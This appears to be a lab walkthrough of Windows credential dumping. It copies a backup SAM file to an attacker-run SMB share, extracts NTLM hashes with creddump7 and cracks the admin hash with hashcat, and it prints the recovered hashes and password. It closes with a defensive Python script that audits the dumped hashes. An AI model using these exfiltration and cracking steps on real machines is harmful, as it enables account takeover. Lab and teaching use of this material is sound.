The content of this post starts at 7:15 in the video.
The Security Accounts Manager, or SAM, stores the security information for local user accounts, including password hashes.
These hashes are encrypted with a key, but that key can be recovered from the SYSTEM file.
If you can read both the SAM and the SYSTEM file, you can extract the password hashes.
SAM/SYSTEM Locations
The SAM and SYSTEM files are located in the C:\Windows\System32\config directory.
While Windows is running, these files are locked.
Backups of the files may exist in the C:\Windows\Repair or C:\Windows\System32\config\RegBack directories.
On the Kali host, start an SMB server that shares the current directory:
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
From the Windows machine, run copy to push the file to the remote SMB share:
copy C:\Windows\Repair\SAM \\10.13.22.153\kali\
Result:
┌──(root㉿kali)-[~/桌面]
└─# sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.175,49898)
[*] AUTHENTICATE_MESSAGE (WIN-QBA94KB3IOF\user,WIN-QBA94KB3IOF)
[*] User WIN-QBA94KB3IOF\user authenticated successfully
[*] user::WIN-QBA94KB3IOF:aaaaaaaaaaaaaaaa:9801547dd0bfaf2f557bd7157a2a5e8e:
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:KALI)
[*] Closing down connection (10.10.11.175,49898)
[*] Remaining connections []
[*] Incoming connection (10.10.11.175,49920)
[*] AUTHENTICATE_MESSAGE (WIN-QBA94KB3IOF\user,WIN-QBA94KB3IOF)
[*] User WIN-QBA94KB3IOF\user authenticated successfully
[*] user::WIN-QBA94KB3IOF:aaaaaaaaaaaaaaaa:3a9edb604219d62a553f0605f6c54cea:
On the attacking machine, clone the creddump7 repository (the version packaged in Kali is outdated and does not dump hashes correctly for Windows 10!) and use it to dump the hashes from the SAM and SYSTEM files:
git clone https://github.com/Tib3rius/creddump7
pip3 install pycrypto
python3 creddump7/pwdump.py SYSTEM SAM
There is a pitfall here:
pip3 install pycrypto
failed for me with an error.
I then ran pip3 install pycryptodome -i https://pypi.tuna.tsinghua.edu.cn/simple/
instead, which installed successfully:
┌──(root㉿kali)-[~/桌面]
└─# pip3 install pycryptodome -i https://pypi.tuna.tsinghua.edu.cn/simple/
Looking in indexes: https://pypi.tuna.tsinghua.edu.cn/simple/
Collecting pycryptodome
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/14/58/77278d7a078241b55b515f6073b90108125fb0d197b384a0f372c5f61c80/pycryptodome-3.17-cp35-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (2.1 MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 2.1/2.1 MB 660.3 kB/s eta 0:00:00
Installing collected packages: pycryptodome
Successfully installed pycryptodome-3.17
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
┌──(root㉿kali)-[~/桌面]
└─#
Run the tool against the SAM and SYSTEM files to extract the NTLM hashes:
┌──(root㉿kali)-[~/桌面]
└─# python3 creddump7/pwdump.py SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2:::
user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
Crack the admin user's NTLM hash with hashcat:
hashcat -m 1000 --force <hash> /usr/share/wordlists/rockyou.txt
The first time you run this on Kali you have to unzip rockyou.zip in that directory, otherwise the wordlist file does not exist.
Once it is unzipped, run hashcat on the NTLM hash obtained above:
hashcat -m 1000 --force a9fdfa038c4b75ebc76dc855dd74f0da /usr/share/wordlists/rockyou.txt
Result:
┌──(root㉿kali)-[~/桌面]
└─# hashcat -m 1000 --force a9fdfa038c4b75ebc76dc855dd74f0da /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-Intel(R) Core(TM) i5-9400 CPU @ 2.90GHz, 1435/2934 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
**a9fdfa038c4b75ebc76dc855dd74f0da:password123**
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: a9fdfa038c4b75ebc76dc855dd74f0da
Time.Started.....: Fri Mar 31 01:42:01 2023, (0 secs)
Time.Estimated...: Fri Mar 31 01:42:01 2023, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 27405 H/s (0.09ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2048/14344385 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 1024/14344385 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: kucing -> lovers1
Hardware.Mon.#1..: Util: 24%
Started: Fri Mar 31 01:41:30 2023
Stopped: Fri Mar 31 01:42:02 2023
┌──(root㉿kali)-[~/桌面]
└─#
The cracked credentials can be read from the output above:
a9fdfa038c4b75ebc76dc855dd74f0da:password123
With those, log in directly.
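As an added example (not part of the original write-up, and not code from creddump7 or hashcat), the following Python script ties the two results above together from a defender's side: it parses pwdump-format lines like the ones printed by pwdump.py, flags accounts whose NT hash is the hash of the empty string (a blank password, as the Guest and DefaultAccount entries show) or that still carry a real LM hash, and recomputes the NT hash (MD4 over the UTF-16LE password) to confirm hashcat's result for the admin account offline. MD4 is implemented in pure Python because hashlib's md4 is unavailable on OpenSSL 3 builds without the legacy provider. The sample dump lines are copied from the output above; the function and constant names are this example's own.

```python
import struct

MASK32 = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash stored when LM hashing is disabled (empty LM password)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NTLM hash of the empty string: account has a blank password


def _rotl(x, s):
    return ((x << s) | (x >> (32 - s))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), used because hashlib's md4 is often missing on OpenSSL 3."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    # Padding: 0x80, zeros to 56 mod 64, then the 64-bit little-endian bit length.
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z

    # (round function, additive constant, word order, per-step rotation amounts)
    rounds = (
        (F, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                # Each step rotates the roles (a,b,c,d) -> (d,a',b,c), as in the RFC's [ABCD]/[DABC]/... tables.
                a, b, c, d = d, _rotl((a + fn(b, c, d) + X[k] + const) & MASK32, shifts[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & MASK32, (b0 + b) & MASK32, (c0 + c) & MASK32, (d0 + d) & MASK32
    return struct.pack("<4I", a0, b0, c0, d0)


def ntlm_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE encoding of the password, as hashcat mode 1000 expects it."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump_line(line: str) -> dict:
    """Parse one 'user:rid:lmhash:nthash:::' line as printed by pwdump.py."""
    fields = line.strip().split(":")
    if len(fields) < 4:
        raise ValueError(f"not a pwdump line: {line!r}")
    return {"user": fields[0], "rid": int(fields[1]), "lm": fields[2].lower(), "nt": fields[3].lower()}


def audit_dump(lines) -> list:
    """Return (user, finding) pairs a defender would act on: blank passwords and LM hashes still stored."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        acct = parse_pwdump_line(line)
        if acct["nt"] == EMPTY_NT:
            findings.append((acct["user"], "blank password (NT hash of the empty string)"))
        if acct["lm"] != EMPTY_LM:
            findings.append((acct["user"], "non-empty LM hash stored (LM hashing still enabled)"))
    return findings


def verify_candidate(nt_hex: str, candidate: str) -> bool:
    """Confirm a cracked result offline by recomputing the NT hash of the candidate password."""
    return ntlm_hash(candidate) == nt_hex.lower()


# Sample input: the pwdump.py output lines from the write-up above.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2:::
user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
""".splitlines()

if __name__ == "__main__":
    for user, finding in audit_dump(SAMPLE_DUMP):
        print(f"{user}: {finding}")
    admin_nt = parse_pwdump_line(SAMPLE_DUMP[-1])["nt"]
    print("hashcat result confirmed:", verify_candidate(admin_nt, "password123"))
```

The blank-password check is the part worth running against any SAM dump from a host review: Guest and DefaultAccount are disabled by default, but a built-in or service account with the empty-string NT hash and no "account disabled" flag is an immediate finding. The LM check never fires on this dump because every entry carries the empty LM hash, which is what a correctly configured Windows 10 host should show.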